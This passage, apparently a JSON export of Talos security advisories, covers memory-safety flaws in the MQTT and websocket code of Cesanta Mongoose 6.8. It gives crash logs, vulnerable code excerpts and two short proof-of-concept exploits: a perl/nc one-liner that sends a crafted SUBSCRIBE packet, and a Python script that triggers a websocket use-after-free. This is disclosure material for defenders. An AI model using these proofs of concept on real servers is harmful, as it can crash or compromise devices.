==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Invalid write of size 2\n ==118470== at 0x4C32723: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403EBE: mbuf_insert (mongoose.c:1075)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Syscall param socketcall.sendto(msg) points to unaddressable byte(s)\n ==118470== at 0x54F799D: send (send.c:26)\n ==118470== by 0x40A40E: mg_write_to_socket (mongoose.c:3316)\n ==118470== by 0x40ACC2: mg_mgr_handle_conn (mongoose.c:3508)\n ==118470== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==118470== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==118470== by 0x4022A6: main (mqtt_broker.c:43)\n ==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT Payload Length Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0399", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0399", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-476: NULL Pointer Dereference\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nIn the MQTT protocol, a client initiates the connection by sending a CONNECT command, to which a server replies with CONNACK and then client proceeds with other commands. In the case of the mongoose MQTT server, if an out of order SUBSCRIBE packet is received by the server certain uninitialized structures are accessed which can lead to NULL pointer dereference and server crash. Specifically, in the function `mg_mqtt_broker_handle_subscribe` :\n \n \n struct mg_mqtt_session *ss = (struct mg_mqtt_session *) nc->user_data; [1]\n uint8_t qoss[512];\n size_t qoss_len = 0;\n struct mg_str topic;\n uint8_t qos;\n int pos;\n struct mg_mqtt_topic_expression *te;\n \n or (pos = 0;\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\n qoss[qoss_len++] = qos;\n \n \n ss->subscriptions = (struct mg_mqtt_topic_expression *) realloc(\n ss->subscriptions, sizeof(*ss->subscriptions) * qoss_len); [2]\n \n\nIn the above code, at [1] we see `ss` being initialized to point to `nc->user_data` which can be null. At [2] `ss` pointer is dereferenced to access the `subscriptions` field which causes a NULL pointer dereference and leads to a server crash. This vulnerability can be triggered by sending bytes from the proof of concept to the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Valgrind output:\n \n \n ==119048== Invalid read of size 8\n ==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\n ==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\n ==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==119048== by 0x4071B6: mg_call (mongoose.c:2051)\n ==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==119048== by 0x4022A6: main (mqtt_broker.c:43)\n ==119048== Address 0x30 is not stack'd, malloc'd or (recently) free'd\n ==119048==\n ==119048==\n ==119048== Process terminating with default action of signal 11 (SIGSEGV): dumping core\n ==119048== Access not within mapped region at address 0x30\n ==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\n ==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\n ==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==119048== by 0x4071B6: mg_call (mongoose.c:2051)\n ==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==119048== by 0x4022A6: main (mqtt_broker.c:43)\n ==119048== If you believe this happened as a result of a stack\n ==119048== overflow in your program's main thread (unlikely but\n ==119048== possible), you can try to increase the size of the\n ==119048== main thread stack using the --main-stacksize= flag.\n ==119048== The main thread stack size used in this run was 8388608.\n ==119048==\n ==119048== HEAP SUMMARY:\n ==119048== in use at exit: 5,698 bytes in 154 blocks\n ==119048== total heap usage: 159 allocs, 5 frees, 7,154 bytes allocated\n ==119048==\n ==119048== LEAK SUMMARY:\n ==119048== definitely lost: 0 bytes in 0 blocks\n ==119048== indirectly lost: 0 bytes in 0 blocks\n ==119048== possibly lost: 0 bytes in 0 blocks\n ==119048== still reachable: 5,698 bytes in 154 blocks\n ==119048== suppressed: 0 bytes in 0 blocks\n ==119048== Rerun with --leak-check=full to see details of leaked memory\n ==119048==\n ==119048== For counts of detected and suppressed errors, rerun with: -v\n ==119048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\n Segmentation fault\n \n\n### Exploit Proof-of-Concept\n\nperl -e \u2018print \u201c\\x80\\x86\\x00\\x00AAAA\u201d\u2019 | nc \n---|--- \n \n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0400", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0400", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-07T19:10:19", "description": "### Summary\n\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of=bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing an MQTT packet SUBSCRIBE command, topic string size as encoded in the packet is trusted without any additional validation. This arbitrary length value is used in pointer arithmetic and can cause out-of-bounds memory access. The vulnerability occurs in function `mg_mqtt_next_subscribe_topic`:\n \n \n int mg_mqtt_next_subscribe_topic(struct mg_mqtt_message *msg,\n struct mg_str *topic, uint8_t *qos, int pos) {\n unsigned char *buf = (unsigned char *) msg->payload.p + pos;\n \n if ((size_t) pos >= msg->payload.len) {\n return -1;\n \n \n topic->len = buf[0] << 8 | buf[1]; [1]\n topic->p = (char *) buf + 2;\n *qos = buf[2 + topic->len]; [2]\n return pos + 2 + topic->len + 1;\n \n\nIn the above code, at [1] two bytes from message buffer are read as `topic->len` and then immediatelly used at [2] to calculate offset to `qos`. No check is performed to insure it would be inside the bounds of the buffer which is limited in size. This issue can be triggered multiple times and with careful control of the memory layout could be abused to leak memory and cause denial of service.\n\nThe vulnerability can be triggered by sending the supplied proof of concept packet to the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Address Sanitizer output:\n ==118728==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000014986 at pc 0x00000051e4c5 bp 0x7fffffffaf50 sp \n 0x7fffffffaf48\n READ of size 1 at 0x619000014986 thread T0\n #0 0x51e4c4 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\n #1 0x515174 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x515174)\n #2 0x4fa825 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fa825)\n #3 0x4fea17 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fea17)\n #4 0x50a8e7 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50a8e7)\n #5 0x50efa8 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50efa8)\n #6 0x4fc145 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fc145)\n #7 0x4eb5ea (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4eb5ea)\n #8 0x7ffff683882f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)\n #9 0x419978 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x419978)\n \n \n AddressSanitizer can not describe address in more detail (wild memory access suspected).\n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\n Shadow bytes around the buggy address:\n 0x0c327fffa8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n =>0x0c327fffa930:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n ddressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==118728==ABORTING\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0402", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0402", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It\u2019s HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nA websocket frame can be fragmented over multiple packets. Flags in the websocket header specify if the packet is fragmented and it\u2019s order. When encountering a first frame fragment, a buffer reallocation causes several pointers to become invalid, but the code doesn\u2019t invalidate or update them leading to potential use after free condition which can lead to further memory corruption.\n\nIn function `mg_deliver_websocket_data` responsible for parsing the websocket packet we observe the following code:\n \n \n if (reass) { [1]\n /* On first fragmented frame, nullify size */\n if (mg_is_ws_first_fragment(wsm.flags)) { [2]\n mbuf_resize(&nc->recv_mbuf, nc->recv_mbuf.size + sizeof(*sizep)); [3]\n p[0] &= ~0x0f; /* Next frames will be treated as continuation */ [4]\n buf = p + 1 + sizeof(*sizep); [5]\n *sizep = 0; /* TODO(lsm): fix. this can stomp over frame data */ [6]\n }\n \n /* Append this frame to the reassembled buffer */ \n memmove(buf, wsm.data, e - wsm.data); [7]\n \n\nIn the above code, if the packet is marked for reassembly (checked at [1]) and is first fragment (checked at [2]), receive buffer is resized at [3]. Function `mbuf_resize` actually calls `realloc` to resize the buffer. Calling `realloc` on a buffer to resize it doesn\u2019t guarantee that the same memory would be used, a different heap chunk can be chosen and original data would be copied there. This effectively makes old pointers - pointing to original buffer - invalid. In the above code, stale pointers are reused at [4],[5],[6] and [7] to do memory reads, writes and a memory copy. Pointers `p`, `buf`,`e`,sizep` and `wsm.data` are all initialized based on original `nc->recv_mbuf` buffer at the beginning of the function:\n \n \n static int mg_deliver_websocket_data(struct mg_connection *nc) {\n /* Using unsigned char *, cause of integer arithmetic below */\n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,\n mask_len = 0, header_len = 0;\n unsigned char *p = (unsigned char *) nc->recv_mbuf.buf, *buf = p,\n *e = p + buf_len;\n \n\nCalling `realloc` won\u2019t invalidate a pointer always but, in this case steps can be taken make that probability higher, like multiple simultaneous network connections. Not invalidating and updating pointers after `realloc` leads to a use after free condition which can be abused to cause denial of service and ultimately remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88299==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000005f80 at pc 0x00000051b1ee bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000005f80 thread T0\n #0 0x51b1ed in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8874\n #1 0x51b1ed in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? ??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? ??:0\n \n \n 0x619000005f80 is located 0 bytes inside of 1024-byte region [0x619000005f80,0x619000006380)\n freed by thread T0 here:\n #0 0x4b9308 in realloc ??:?\n #1 0x4b9308 in ?? ??:0\n #2 0x4f0275 in mbuf_resize /home/user/mongoose/examples/websocket_chat/../../mongoose.c:1044 (discriminator 1)\n #3 0x4f0275 in ?? ??:0\n \n \n previously allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? ??:0\n #4 0x60200000efef (<unknown module>)\n \n \n SUMMARY: AddressSanitizer: heap-use-after-free (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51b1ed)\n Shadow bytes around the buggy address:\n 0x0c327fff8ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8bd0: 04 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n =>0x0c327fff8bf0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c327fff8c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c327fff8c10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c327fff8c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c327fff8c30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c327fff8c40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==88299==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import random\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n \n \n payload = \"\\x01\" # need to pass two checks:\n \"\"\"\n static int mg_is_ws_fragment(unsigned char flags) {\n return (flags & 0x80) == 0 || (flags & 0x0f) == 0;\n }\n \n \n static int mg_is_ws_first_fragment(unsigned char flags) {\n return (flags & 0x80) == 0 && (flags & 0x0f) != 0;\n }\n payload += chr(0x00 | 50 ) # packet doesn't have to be masked, so we can ommit it, size doesn't matter\n payload += \"A\"*(60+ random.randint(0,20000)) # rest of the packet doesn't matter\n \"\"\"\n append random length of garbage so it's a bit easier to trigger the realloc when runing without ASAN ,\n valgrind, or libdislocator, otherwise ~60 is enough\n \"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 